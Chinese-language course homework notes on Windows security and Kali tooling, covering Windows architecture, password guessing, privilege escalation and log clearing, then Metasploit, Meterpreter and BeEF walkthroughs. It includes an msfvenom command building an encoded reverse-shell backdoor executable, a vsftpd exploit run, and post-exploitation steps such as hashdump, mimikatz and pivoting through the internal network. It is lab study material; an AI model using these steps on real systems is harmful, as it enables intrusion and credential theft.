20189315《网络攻防实践》第七周做业

a.教材第七章做业

第七章Windouws操做系统安全攻防的内容进行学习。Windouws是目前市场上占统治地位的操做系统，到2010年，已经占据了百分之八十八的市场份额。基本结构分为运行于处理器特权模式的操做系统内核，已经运行在处理器非特权模式的用户空间代码，与UNIX同样，采用宏内核模式来进行架构，这也使得系统更容易遭受Rootkit的危害，为了应对这种攻击，采用数字签名的办法提升安全性。Windows操做系统中，有用户，用户组和计算机三大类，对于每一个安全主体，空间和时间上都全局惟一的SID安全标识符来进行标识.对于Windows，远程攻击技术分为：远程口令猜想与破解攻击，攻击Windows网络服务，攻击Windows客户端及用户这三大类。Windows经过基于服务器消息块协议承载的文件与打印共享服务来为网络用户提供远程访问文件系统的和打印机的支持，因此SMB协议也成为了攻击者实施远程口令字猜想的攻击渠道，目前自动执行远程口令字猜想的工具备不少，其中比较流行的包括legin，enum，NTSscan等。攻击者在目标系统上达到本身的需求和目的后，通常还会在系统中植入远程控制系统，维持对这台主机的控制权，好比一些命令行远程控制工具Netcat，或者图形化远程控制工具，其中最著名的是VNC软件。

Windows操做系统基本框架

一、windows基本结构分为运行于处理器特权模式的操做系统内核以及运行在处理器非特权模式的用户，即为内核态和用户态。
二、内核态：windows执行体、windows内核体、设备驱动程序、硬件抽象层、windows窗口与图形界面接口。
三、用户态：系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
四、核心机制：进程和线程管理机制、内存管理机制、文件管理机制、注册表管理机制、网络管理机制。
五、网络管理机制：网卡硬件驱动程序（物理层）、NDIS库以及miniport驱动程序（链路层）、TDI传输层（网络协议驱动）（网络层和传输层）、网络APID以及TDI客户端（会话层和表示层）、网络应用程序和服务进程（应用层）。

安全体系结构和机制

一、监控器模型：主体到客体的访问都经过监控器做中间，由引用监控器根据安全访问控制策略来进行受权访问，全部访问记录都由监控器生成审计日志。
二、核心：SRM安全引用监控（内核中）、LSASS安全服务（用户态）、winlogon/netlogn、以及Eventlog
三、身份认证机制：安全主体：用户、用户组、计算机 身份认证：本地身份认证（winlogon进程、GINA图形化登陆窗口与LSASS服务）、网络身份认证（NTLM、Lanman、kerberos）
四、受权与访问控制机制：对象：文件，目录，注册表键值，内核对象，同步对象，私有对象，管道，内存，通讯接口。 属性组成：Owner SID，Group SID，DACL自主访问控制列表，SACL系统审计访问控制列表。
五、安全审计机制
六、其余安全机制：安全中心（防火墙、补丁自动更新、病毒防御），IPsec加载和验证机制，EPS加密文件系统，windows文件保护机制，捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制。

远程安全攻防技术

一、包括远程口令猜解攻击、windows网络服务攻击，windows客户端和用户攻击。
二、生命周期：windows安全漏洞发现，利用与修补过程 安全漏洞公开披露信息 CVE,NVD,SecyrityFocus，OSVDB 针对特定目标的渗透测试攻击过程：漏洞扫描测试、查找针对发现漏洞的渗透代码、实施渗透测试 使用metasploit软件实施渗透测试：用户接口（CLI、Console，web，GUI）
三、远程口令猜解攻击: 远程口令猜解：SMB协议（tcp44五、tcp139），其余包括WMI服务、TS远程桌面终端服务，MY SQL数据库服务、SharePoint。工具包括：Legion、enum、smbgrind、NTScan、XScan、流光 远程口令字交换通讯窃听与破解：NTLM、Lanman、NTLMV2和kerberos网络认证协议的弱点。 远程口令猜解的防范：关闭没必要要的易受攻击的网络服务、配置主机防火墙来限制某些端口服务、网络防火墙限制这些服务的访问、禁用过期且有安全缺陷的Lanman和NTLM、指定强口令策略。
四、网络服务远程渗透攻击：针对NETBIOS服务的著名漏洞和攻击、针对SMB服务的著名漏洞和攻击、针对MSRPC服务的著名漏洞和攻击、针对windows系统上微软网络的远程渗透攻击、针对windows系统上第三方服务的远程渗透攻击。 防范措施：最基本的是尽可能避免与消除这些渗透攻击所依赖的服务软件安全漏洞。

本地安全攻防技术

一、本地提权攻击：利用操做系统内核、特权用户启动程序中安全缺陷与漏洞，缘由是服务器和桌面系统没有即时进行补丁更新。
二、敏感信息窃取： windows系统口令密文提取技术（拷贝口令密文文件、rdisk工具有份、pwdumpx从SAM文件或者活动目录中提取口令密文） windows系统口令字破解技术（L0phtCrack、John theRipperCain） 用户敏感数据窃取：find、findstr、grep、meterpreter 本地敏感信息窃取防范：选择高强度、高防护的口令，使用更安全的加密明文算法，安全配置策略。

windows消灭踪影

一、消灭踪影：关闭审计功能、清理事件日志。 防范措施：事先设置系统审计和网络服务审计，日志记录在不可擦除的CDROM上。
二、远控和后门程序： 远控：命令行远控工具（Netcat，psexec，meterpreter），图形化远控工具（VNC,RemoteAdmin，PCanyware） 后门程序：国外（BO、BO2K），国内（冰河、灰鸽子、广外女生、PCshare、磁碟机、机器狗等） 防范措施：后门检测软件、杀软、rootkitrerealer、IcSword。

b.kali视频学习

一、Kali漏洞利用之检索与利用

一、searchsploit能够借助关键词搜索漏洞信息以及漏洞对应的exp

searchsploit wordpress

二、ikat自动化开启不一样的exp。等待目标访问中招。

三、termineter旨在评估智能电表的安全性

二、Kali 漏洞利用之Metasploit基础

Metasploit在渗透测试中常常被用到。这套软件包括了不少工具，这些工具组成了一个完整的攻击框架。
一、启动服务
在Kali中使用Metasploit，须要先开启PostgreSQL数据库服务和metasploit服务，而后就能够利用msf数据库查询exploit和记录。
二、路径介绍
Kali中msf的路径为/usr/share/metasploit-framework

三、msfpayload:用来生成payload或者shellcode。 搜索能够用msfpayload -l |gre[ "windows"查询； -o选项能够列出payload所需的参数。
msfencode：msf中的编码器，早期用来绕过AV（杀毒软件），现经常使用msfpayload与它编码避免exploit的坏字符串。
msfconsole：开启metasploit的console。
输入msfconsole，打开msf

四、测试示例：发现漏洞，搜索exploit
nmap -sV 192.168.1.105
此版本是否存在漏洞，在msf里用search vsftpd搜索一下

五、测试示例：选择exploit，查看参数

进入exploit时发生点小问题，检查以后发现是本身输入错误，改正后正确进入
查看参数，发现RHOST的参数还未设置，接下来为其设置参数set RHOST 192.168.1.105

六、测试示例：选择payload

设置好以后，show options查看参数,发现没有要设置的参数了

七、执行攻击
输入exploit便可进行攻击测试，若是成功，将返回一个shell：

三、Kali漏洞利用之Meterpreter介绍

Meterpreter是metasploit框架中的一个扩展模块，做为溢出成功之后的攻击载荷使用，攻击载荷在溢出攻击成功之后绐咱们返回一个控制通道。使用它做为攻击载荷可以得到目标系统的—个meterpretershell的连接。
一、生成meterpreter后门
选定攻击载荷windows/meterpreter/reverse_tcp（针对windows，反向链接shell），使用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.161 LPORT=2333 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe

生成后门

二、监听设置
生成的后门须要有相应的监听。打开metasploit的console，配置一个反弹会话处理程序：

三、meterpreter shell
当目标机器成功执行backdoor.exe后，咱们就取得了一个 meterpreter shell 。输入background返回msf，若是想返回meterpreter shell，输入sessions查看ID，输入sessions -i ID选择想返回的会话。

在meterpreter shell中输入help查看可执行的命令，如sysinfo显示目标系统信息，hashdump抓取哈希，pwd显示当前路径等。

meterpreter还有一些扩展工具，使用load + tab键查看这些工具，而后选择所需工具进行使用（load mimikatz 用来抓取系统明文）。

四、Kali漏洞利用之Metasploit后渗透测试

在跳板获取必定权限后须要积极地向内网主机权限发展，获取指定的目标信息，探查系统漏洞，借助msf已经获得的Meterpreter后门，可使系列的操做更容易。
一、查看当前网卡、网段信息（使用ifconfig）。可查看到三个网卡，一个是本地网卡，另外一个是咱们能访问的网卡，还有一个网卡具备内网IP（访问不到，能够ping如下试试）。
二、添加路由表run autoroute -s 10.0.0.1可使用msf中的模块跨网段攻击或扫描。可经过脚本autoroute快速添加。
三、开socket代理，经过使用auxiliary/server/socks4a模块，建立一个socks代理，能够为浏览器，sqlmap，nmap使用。经过代理便可访问内网计算机。
四、经过background和session -i能够自由切换进入session。
五、输入run能够看到在meterpreter上能够作的不少命令。
六、经过run post/能够看到后渗透测试模块。
七、获取内网信息run arp_scanner -r 10.0.0.1/24
八、也能够上传文件，作端口转发后进行后续测试,例如upload lcx.exe c:\传送文件到c盘根目录。

五、Kali漏洞利用之BeEF

对XSS漏洞每每须要一个强大的框架支持，如网络上的XSS平台，在KALI下，BeEf是一款丝绝不逊于XSS平台的工具。BeEf是浏览器攻击框架的简称，是一款专一于浏览器的渗透测试工具，它扩展了跨站漏洞的利用，能hook不少浏览器并能够执行不少内嵌命令。
一、命令行输入beef-xss，浏览器自动访问页面


二、假设被测试主机因为XSS漏洞请求到http://127.0.0.1:3000/demos/basic.html

此时页面左侧就会多出一项在线主机：

三、HOOK持续的时间为测试页面时间为止，在此期间，至关于被控制了，能够发送攻击命令，在Command模块，能够完成许多功能。

四、选区MISC下的Raw JavaScript模块做为测试用例，输入“hello world！”，点击excute进行攻击。

五、Proxy功能（代理功能）
选中目标主机，点右键，在菜单中选中Use as Proxy；而后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。

六、BeEF默认是不加载Metasploit的，若是要使用Metasploit丰富的攻击模块，须要作些配置.
配置：首先打开beef-xss目录：

将Metasploit的false修改成true：

保证此处IP等信息设置正确（不适用127.0.0.1，需使用本机IP），并修改Custom路径：

将host和callback_host行的IP修改成本机IP,并修改custom路径为/usr/share/metasploit-framework/
配置好后打开msfconsole，运行命令：

执行./beef -x
从新加载Metasploit的exploit模块：

加载以后，重启下服务：service beef-xss restart 此时再访问如下以前的页面，发现没法链接，稍等片刻，使用默认用户密码登陆进去。发现Metasploit下多了许多模块。